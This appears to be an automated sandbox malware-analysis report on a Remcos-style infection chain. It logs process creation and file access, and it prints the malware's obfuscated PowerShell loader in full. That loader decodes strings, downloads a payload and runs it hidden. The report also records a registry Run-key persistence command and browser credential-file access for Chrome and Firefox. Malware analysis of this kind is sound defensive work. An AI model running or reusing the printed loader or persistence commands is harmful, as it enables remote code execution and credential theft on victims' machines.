]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=meta$d,katacc a abea c sg
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=met
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#chrimsel aflsser purificant #>;$hydrosphere='northumbria';<#opkaldelses torsionernes certifiability iconomachal neutronerne abv afgiftningers #>;$fileresdeologikritikkernes=$lovregel+$host.ui; function viruserne($tentaculite){if ($fileresdeologikritikkernes) {$gasapparats++;}$fileresmitators=$troldunges+$tentaculite.'length'-$gasapparats; for( $fileres=4;$fileres -lt $fileresmitators;$fileres+=5){$sempres=$fileres;$haccucal+=$tentaculite[$fileres];$threadmaking='bagstoppere';}$haccucal;}function vvningens($smadrekassens){ & ($hypogeic122) ($smadrekassens);}$taagngeres=viruserne 'r sumchloomaalz ko icoerlsylflhyb.adyrt/delg ';$taagngeres+=viruserne 'comp5helb.bai 0moth rege(maiiwbe aitarantam,d surotaanwfisksd.bk esinsandteunu cayu1t nt0rets.sp j0ster; kha retwbergi npan sta6peac4parb; woo vegxreto6syne4 f,i; nov massrbondvstud:yug,1mu.v3inge1a ur. pap0 pil)gimb usk gcirce milceskok svao c a/kons2 ell0mure1domi0 kar0edde1tamm0 ato1smut re,mfg aciste.rforvesaloftankosmrexhuck/miso1dena3gird1bi d. mid0data ';$uncorner=viruserne ',edguvilds xtre defromdm-folkadrawgm theprepnernrt mi. ';$neuk=viruserne 'delrhracethk rtro kptatasf.du:over/thra/storeequ thavfhteisyk imslasi. ,atrfistoviri/smaanthymo elinathyaun fdreasdatomijibicpikatbureistepnrg ago ga. dumqcounx enedscri ';$dacryd=viruserne 'felt>hjer ';$hypogeic122=viruserne 'trafivinoe trixgono ';$gar='nondenunciatory';$fejlfunktioner='\trykimprgneredes.ene';vvningens (viruserne 'sp.y$ho.lg stolafv okarlb ekaanondllent: ud.spe iu samp,skve terrdaemdbankusupergesta tirlvalg=lank$ inde katnbrobvlact: senainfopterrpjongd s saf rmt reta.obb+ lat$ps,ufdesqehowljris larchfunfeu jlknulykkconst e,iisi.tokerbnmusee ha rwave ');vvningens (viruserne 'alte$w dlg konltra otyvsb t aa lalexec:uddamuna obestst ilaunasi morkm.urki,ideunexr barnb.rgepapi= .an$dopinsvr.etrykurebrkkatr. agisfagsp bdel dagi vi t.uss(uds $f nzds apasvancunderk dry predlege)shin ');vvningens (viruserne 'd.fi[,rayn adkedragt ido.tri s dupetredra skvsul,isknlcindie undp re o rndiguatnnondt s emfarvastranp egaauxogudlyeudg,rclo ]para:bu,a:inlasuncaeconncf,rkurallro griwithtcharyserapradirnarkodiplto,thokontclangopygalland t,rp=skin .ver[banknkoe,epoi t,ent.unsuseryte tancagaruforpr va,ip ivt broyfrgepbrndr incotravtsurmobwancjasiounqul destvapoyphytp latesk f]hand:velv: s,dt ,tel vidsstam1duct2skr ');$neuk=$mosaikkerne[0];$srlovgivningerne=(viruserne 'pek.$u pagstenla trocir.bskafa thelsk,l: to f llotopar unowunscasinorprotdsperegut re ols unh=gavnnf leeoxydwmugg-backoubetbam,njhorse ,udc fortw,gl refusthriyenkesremutperoeepalmt,al. eprnthiceplaytar e. ypnwacylesl,gbsp rcve,slmoorifinpegendn i etanem ');vvningens ($srlovgivningerne);vvningens (viruserne 'st n$ufrefgeheocentr i gw,rbiamanurgen dglanemellrbosss.oru.tl ehalkoetilsapostdkal el,str forss.ri[wago$mul.uchain codcsyklo satr curnn.nleldrer .na]or h=meta$d,katacc a abea c sg Jump to behavior
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\r
Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Manager
Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Manager`
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\5
Source: msiexec.exe, 00000008.00000003.2763185230.0000000008A99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753687035.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\
Source: msiexec.exe, 00000008.00000003.2763185230.0000000008A99000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763544651.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\m
Source: msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Managerk\
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\d
Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Manager\logs.datW
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\I
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\:
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\{
Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Managerenh.dllL
Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: msiexec.exe, 00000008.00000003.1967938217.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1967893762.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1938909757.0000000008A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager{
Source: msiexec.exe, 00000008.00000003.2716260605.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735940362.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715517032.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ2\@
Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cProgram Managerk\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 15_2_0041881C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 16_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041739B GetVersionExW, 15_2_0041739B
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
